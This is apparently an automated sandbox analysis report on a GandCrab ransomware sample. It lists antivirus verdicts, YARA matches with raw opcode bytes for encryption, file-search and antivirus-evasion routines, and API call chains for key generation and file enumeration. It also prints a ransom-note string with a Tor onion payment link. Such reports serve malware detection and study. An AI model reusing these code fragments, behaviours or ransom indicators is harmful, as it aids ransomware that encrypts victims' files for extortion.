14.2.mqsmvj.exe.f580000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 58 0F 8B 35 44 A1 58 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 58 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 58 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 58 0F 8B 35 10 A1 58 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 58 0F C7 44 24 1C 64 F4 58 0F C7 44 24 20 80 F4 58 0F C7 44 24 24 A0 F4 58 0F C7 44 24 28 BC F4 58 0F C7 44 24 2C D8 F4 58 0F C7 44 24 30 F0 F4 58 0F C7 44 24 34 04 F5 58 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 58 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 59 0F C7 45 B8 BC 03 59 0F C7 45 BC ...
Click to see the 442 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: IJr8RvvhZ3.exe	Virustotal: Detection: 87%	Perma Link
Source: IJr8RvvhZ3.exe	Metadefender: Detection: 86%	Perma Link
Source: IJr8RvvhZ3.exe	ReversingLabs: Detection: 96%

Antivirus / Scanner detection for submitted sample

Source: IJr8RvvhZ3.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://gdcbmuveqjsli57x.onion/63b5ce1c617217a5

Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe

Avira: detection malicious, Label: TR/Dropper.Gen

Machine Learning detection for sample

Source: IJr8RvvhZ3.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe

Joe Sandbox ML: detected

Source: 25.3.mqsmvj.exe.3490000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 3.3.mqsmvj.exe.3790000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 27.0.mqsmvj.exe.f580000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 22.0.mqsmvj.exe.f580000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 25.2.mqsmvj.exe.f580000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 30.0.mqsmvj.exe.f580000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 0.0.IJr8RvvhZ3.exe.f140000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 34.2.mqsmvj.exe.f580000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 39.2.mqsmvj.exe.f580000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 38.0.mqsmvj.exe.f580000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 36.0.mqsmvj.exe.f580000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 23.0.mqsmvj.exe.f580000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 22.2.mqsmvj.exe.f580000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 28.0.mqsmvj.exe.f580000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 19.2.mqsmvj.exe.f580000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 35.2.mqsmvj.exe.f580000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 14.3.mqsmvj.exe.32b0000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 3.0.mqsmvj.exe.f580000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 16.2.mqsmvj.exe.f580000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 14.0.mqsmvj.exe.f580000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 28.3.mqsmvj.exe.3130000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 16.0.mqsmvj.exe.f580000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 15.2.mqsmvj.exe.f580000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 35.3.mqsmvj.exe.3970000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 19.0.mqsmvj.exe.f580000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 23.3.mqsmvj.exe.3a70000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 19.3.mqsmvj.exe.3930000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 15.0.mqsmvj.exe.f580000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 39.3.mqsmvj.exe.2fb0000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 38.2.mqsmvj.exe.f580000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 11.3.mqsmvj.exe.3290000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 37.2.mqsmvj.exe.f580000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 0.2.IJr8RvvhZ3.exe.f140000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 26.0.mqsmvj.exe.f580000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 11.2.mqsmvj.exe.f580000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 39.0.mqsmvj.exe.f580000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 26.2.mqsmvj.exe.f580000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 16.3.mqsmvj.exe.3b50000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 27.2.mqsmvj.exe.f580000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 12.2.mqsmvj.exe.f580000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 30.2.mqsmvj.exe.f580000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 25.0.mqsmvj.exe.f580000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 3.2.mqsmvj.exe.f580000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 12.3.mqsmvj.exe.2fb0000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 28.2.mqsmvj.exe.f580000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 34.0.mqsmvj.exe.f580000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 36.2.mqsmvj.exe.f580000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 23.2.mqsmvj.exe.f580000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 35.0.mqsmvj.exe.f580000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 30.3.mqsmvj.exe.3470000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 37.3.mqsmvj.exe.3bc0000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.IJr8RvvhZ3.exe.3210000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 11.0.mqsmvj.exe.f580000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 27.3.mqsmvj.exe.3490000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 37.0.mqsmvj.exe.f580000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 12.0.mqsmvj.exe.f580000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 14.2.mqsmvj.exe.f580000.0.unpack	Avira: Label: TR/Dropper.Gen

Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe	Code function: 0_2_0F148400 VirtualAlloc,CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,	0_2_0F148400
Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe	Code function: 0_2_0F144B20 EntryPoint,Sleep,ExitProcess,CreateThread,WaitForSingleObject,TerminateThread,CloseHandle,VirtualAlloc,GetModuleFileNameW,VirtualFree,ExitProcess,Sleep,lstrlenA,VirtualAlloc,CryptStringToBinaryA,ExitProcess,InitializeCriticalSection,DeleteCriticalSection,VirtualAlloc,GetModuleFileNameW,VirtualFree,ShellExecuteW,ExitThread,	0_2_0F144B20
Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe	Code function: 0_2_0F145860 VirtualAlloc,VirtualFree,CryptBinaryToStringA,CryptBinaryToStringA,CryptBinaryToStringA,lstrlenA,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrcatW,lstrcatW,lstrlenW,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcatW,VirtualFree,VirtualFree,VirtualFree,lstrcatW,lstrlenW,lstrlenW,lstrlenA,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenA,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenW,VirtualAlloc,lstrlenW,lstrlenW,VirtualFree,lstrlenW,VirtualAlloc,wsprintfA,lstrlenW,CryptBinaryToStringA,GetLastError,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,MultiByteToWideChar,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,	0_2_0F145860
Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe	Code function: 0_2_0F1482B0 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,	0_2_0F1482B0
Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe	Code function: 0_2_0F1463E0 CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptGenKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CryptAcquireContextW,	0_2_0F1463E0
Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe	Code function: 0_2_0F145670 VirtualAlloc,VirtualAlloc,wsprintfW,lstrlenW,lstrlenW,VirtualFree,lstrlenW,VirtualAlloc,wsprintfA,VirtualAlloc,CryptBinaryToStringA,GetLastError,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,VirtualFree,VirtualFree,VirtualFree,	0_2_0F145670
Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe	Code function: 0_2_0F146660 EnterCriticalSection,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection,	0_2_0F146660
Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe	Code function: 0_2_0F1453D0 lstrlenA,VirtualAlloc,CryptStringToBinaryA,lstrlenA,VirtualAlloc,lstrcpyA,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,VirtualFree,GetLastError,lstrlenA,lstrlenA,VirtualAlloc,VirtualAlloc,VirtualAlloc,lstrcatA,lstrlenA,lstrlenW,lstrlenA,VirtualFree,VirtualFree,VirtualFree,VirtualFree,InternetCloseHandle,	0_2_0F1453D0
Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe	Code function: 0_2_0F1434F0 lstrlenA,VirtualAlloc,VirtualAlloc,CryptStringToBinaryA,VirtualAlloc,VirtualAlloc,wsprintfW,wsprintfW,wsprintfW,VirtualFree,	0_2_0F1434F0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Code function: 3_2_0F585860 VirtualAlloc,VirtualFree,CryptBinaryToStringA,CryptBinaryToStringA,CryptBinaryToStringA,lstrlenA,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrcatW,lstrcatW,lstrlenW,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcatW,VirtualFree,VirtualFree,VirtualFree,lstrcatW,lstrlenW,lstrlenW,lstrlenA,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenA,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenW,VirtualAlloc,lstrlenW,lstrlenW,VirtualFree,lstrlenW,VirtualAlloc,wsprintfA,lstrlenW,CryptBinaryToStringA,GetLastError,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,MultiByteToWideChar,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,	3_2_0F585860
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Code function: 3_2_0F584B20 EntryPoint,Sleep,ExitProcess,CreateThread,WaitForSingleObject,TerminateThread,CloseHandle,VirtualAlloc,GetModuleFileNameW,VirtualFree,ExitProcess,Sleep,lstrlenA,VirtualAlloc,CryptStringToBinaryA,ExitProcess,InitializeCriticalSection,DeleteCriticalSection,VirtualAlloc,GetModuleFileNameW,VirtualFree,ShellExecuteW,ExitThread,	3_2_0F584B20
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Code function: 3_2_0F5863E0 CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptGenKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CryptAcquireContextW,	3_2_0F5863E0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Code function: 3_2_0F5882B0 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,	3_2_0F5882B0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Code function: 3_2_0F585670 VirtualAlloc,VirtualAlloc,wsprintfW,lstrlenW,lstrlenW,VirtualFree,lstrlenW,VirtualAlloc,wsprintfA,VirtualAlloc,CryptBinaryToStringA,GetLastError,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,VirtualFree,VirtualFree,VirtualFree,	3_2_0F585670
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Code function: 3_2_0F586660 EnterCriticalSection,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection,	3_2_0F586660
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Code function: 3_2_0F588400 VirtualAlloc,CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,	3_2_0F588400
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Code function: 3_2_0F5853D0 lstrlenA,VirtualAlloc,CryptStringToBinaryA,lstrlenA,VirtualAlloc,lstrcpyA,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,VirtualFree,GetLastError,lstrlenA,lstrlenA,VirtualAlloc,VirtualAlloc,VirtualAlloc,lstrcatA,lstrlenA,lstrlenW,lstrlenA,VirtualFree,VirtualFree,VirtualFree,VirtualFree,InternetCloseHandle,	3_2_0F5853D0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Code function: 3_2_0F5834F0 lstrlenA,VirtualAlloc,VirtualAlloc,CryptStringToBinaryA,VirtualAlloc,VirtualAlloc,wsprintfW,wsprintfW,wsprintfW,VirtualFree,	3_2_0F5834F0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Code function: 11_2_0F585860 VirtualAlloc,VirtualFree,CryptBinaryToStringA,CryptBinaryToStringA,CryptBinaryToStringA,lstrlenA,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrcatW,lstrcatW,lstrlenW,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcatW,VirtualFree,VirtualFree,VirtualFree,lstrcatW,lstrlenW,lstrlenW,lstrlenA,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenA,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenW,VirtualAlloc,lstrlenW,lstrlenW,VirtualFree,lstrlenW,VirtualAlloc,wsprintfA,lstrlenW,CryptBinaryToStringA,GetLastError,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,MultiByteToWideChar,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,	11_2_0F585860
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Code function: 11_2_0F584B20 EntryPoint,Sleep,ExitProcess,CreateThread,WaitForSingleObject,TerminateThread,CloseHandle,VirtualAlloc,GetModuleFileNameW,VirtualFree,ExitProcess,Sleep,lstrlenA,VirtualAlloc,CryptStringToBinaryA,ExitProcess,InitializeCriticalSection,DeleteCriticalSection,VirtualAlloc,GetModuleFileNameW,VirtualFree,ShellExecuteW,ExitThread,	11_2_0F584B20
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Code function: 11_2_0F5863E0 CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptGenKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CryptAcquireContextW,	11_2_0F5863E0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Code function: 11_2_0F5882B0 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,	11_2_0F5882B0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Code function: 11_2_0F585670 VirtualAlloc,VirtualAlloc,wsprintfW,lstrlenW,lstrlenW,VirtualFree,lstrlenW,VirtualAlloc,wsprintfA,VirtualAlloc,CryptBinaryToStringA,GetLastError,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,VirtualFree,VirtualFree,VirtualFree,	11_2_0F585670
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Code function: 11_2_0F588400 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,	11_2_0F588400
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Code function: 11_2_0F5853D0 lstrlenA,VirtualAlloc,CryptStringToBinaryA,lstrlenA,VirtualAlloc,lstrcpyA,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,VirtualFree,GetLastError,lstrlenA,lstrlenA,VirtualAlloc,VirtualAlloc,VirtualAlloc,lstrcatA,lstrlenA,lstrlenW,lstrlenA,VirtualFree,VirtualFree,VirtualFree,VirtualFree,InternetCloseHandle,	11_2_0F5853D0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Code function: 11_2_0F5834F0 lstrlenA,VirtualAlloc,VirtualAlloc,CryptStringToBinaryA,VirtualAlloc,VirtualAlloc,wsprintfW,wsprintfW,wsprintfW,VirtualFree,	11_2_0F5834F0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Code function: 11_2_0F586682 CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection,	11_2_0F586682

Source: IJr8RvvhZ3.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: IJr8RvvhZ3.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH

Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	File opened: z:
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	File opened: x:
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	File opened: v:
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	File opened: t:
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	File opened: r:
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	File opened: p:
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	File opened: n:
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	File opened: l:
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	File opened: j:
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	File opened: h:
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	File opened: f:
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	File opened: b:
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	File opened: y:
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	File opened: w:
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	File opened: u:
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	File opened: s:
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	File opened: q:
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	File opened: o:
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	File opened: m:
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	File opened: k:
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	File opened: i:
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	File opened: g:
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	File opened: e:
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	File opened: a:

Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe	Code function: 0_2_0F146BA0 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose,	0_2_0F146BA0
Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe	Code function: 0_2_0F146DF0 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,	0_2_0F146DF0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Code function: 3_2_0F586DF0 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,	3_2_0F586DF0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Code function: 3_2_0F586BA0 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose,	3_2_0F586BA0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Code function: 11_2_0F586DF0 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,	11_2_0F586DF0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Code function: 11_2_0F586BA0 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose,	11_2_0F586BA0

Networking

Contains functionality to determine the online IP of the system

Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe	Code function: 0_2_0F146FF0 VirtualAlloc,VirtualAlloc,lstrlenW,lstrlenA,wsprintfW,VirtualFree,InternetCloseHandle, ipv4bot.whatismyipaddress.com	0_2_0F146FF0
Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe	Code function: 0_2_0F146FF0 VirtualAlloc,VirtualAlloc,lstrlenW,lstrlenA,wsprintfW,VirtualFree,InternetCloseHandle, ipv4bot.whatismyipaddress.com	0_2_0F146FF0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Code function: 3_2_0F586FF0 VirtualAlloc,VirtualAlloc,lstrlenW,lstrlenA,wsprintfW,VirtualFree,InternetCloseHandle, ipv4bot.whatismyipaddress.com	3_2_0F586FF0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Code function: 3_2_0F586FF0 VirtualAlloc,VirtualAlloc,lstrlenW,lstrlenA,wsprintfW,VirtualFree,InternetCloseHandle, ipv4bot.whatismyipaddress.com	3_2_0F586FF0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Code function: 11_2_0F586FF0 VirtualAlloc,VirtualAlloc,lstrlenW,lstrlenA,wsprintfW,VirtualFree,InternetCloseHandle, ipv4bot.whatismyipaddress.com	11_2_0F586FF0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Code function: 11_2_0F586FF0 VirtualAlloc,VirtualAlloc,lstrlenW,lstrlenA,wsprintfW,VirtualFree,InternetCloseHandle, ipv4bot.whatismyipaddress.com	11_2_0F586FF0

Found Tor onion address

Source: IJr8RvvhZ3.exe, 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: 4. Open link in tor browser: http://gdcbmuveqjsli57x.onion/63b5ce1c617217a5
Source: mqsmvj.exe, 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmp	String found in binary or memory: 4. Open link in tor browser: http://gdcbmuveqjsli57x.onion/63b5ce1c617217a5
Source: mqsmvj.exe, 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmp	String found in binary or memory: 4. Open link in tor browser: http://gdcbmuveqjsli57x.onion/63b5ce1c617217a5
Source: mqsmvj.exe, 0000000C.00000002.344084967.000000000F592000.00000004.00000001.01000000.00000006.sdmp	String found in binary or memory: 4. Open link in tor browser: http://gdcbmuveqjsli57x.onion/63b5ce1c617217a5
Source: mqsmvj.exe, 0000000E.00000002.374552502.000000000F592000.00000004.00000001.01000000.00000006.sdmp	String found in binary or memory: 4. Open link in tor browser: http://gdcbmuveqjsli57x.onion/63b5ce1c617217a5
Source: mqsmvj.exe, 00000010.00000002.406166723.000000000F592000.00000004.00000001.01000000.00000006.sdmp	String found in binary or memory: 4. Open link in tor browser: http://gdcbmuveqjsli57x.onion/63b5ce1c617217a5
Source: mqsmvj.exe, 00000013.00000002.437026618.000000000F592000.00000004.00000001.01000000.00000006.sdmp	String found in binary or memory: 4. Open link in tor browser: http://gdcbmuveqjsli57x.onion/63b5ce1c617217a5
Source: mqsmvj.exe, 00000017.00000002.473021592.000000000F592000.00000004.00000001.01000000.00000006.sdmp	String found in binary or memory: 4. Open link in tor browser: http://gdcbmuveqjsli57x.onion/63b5ce1c617217a5
Source: mqsmvj.exe, 00000019.00000002.502628191.000000000F592000.00000004.00000001.01000000.00000006.sdmp	String found in binary or memory: 4. Open link in tor browser: http://gdcbmuveqjsli57x.onion/63b5ce1c617217a5
Source: mqsmvj.exe, 0000001B.00000002.543807830.000000000F592000.00000004.00000001.01000000.00000006.sdmp	String found in binary or memory: 4. Open link in tor browser: http://gdcbmuveqjsli57x.onion/63b5ce1c617217a5
Source: mqsmvj.exe, 0000001C.00000002.559901286.000000000F592000.00000004.00000001.01000000.00000006.sdmp	String found in binary or memory: 4. Open link in tor browser: http://gdcbmuveqjsli57x.onion/63b5ce1c617217a5
Source: mqsmvj.exe, 0000001E.00000002.598229388.000000000F592000.00000004.00000001.01000000.00000006.sdmp	String found in binary or memory: 4. Open link in tor browser: http://gdcbmuveqjsli57x.onion/63b5ce1c617217a5
Source: mqsmvj.exe, 00000023.00000002.638125851.000000000F592000.00000004.00000001.01000000.00000006.sdmp	String found in binary or memory: 4. Open link in tor browser: http://gdcbmuveqjsli57x.onion/63b5ce1c617217a5
Source: mqsmvj.exe, 00000025.00000002.681251272.000000000F592000.00000004.00000001.01000000.00000006.sdmp	String found in binary or memory: 4. Open link in tor browser: http://gdcbmuveqjsli57x.onion/63b5ce1c617217a5
Source: mqsmvj.exe, 00000027.00000002.720286366.000000000F592000.00000004.00000001.01000000.00000006.sdmp	String found in binary or memory: 4. Open link in tor browser: http://gdcbmuveqjsli57x.onion/63b5ce1c617217a5

May check the online IP address of the machine

Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe	DNS query: name: ipv4bot.whatismyipaddress.com
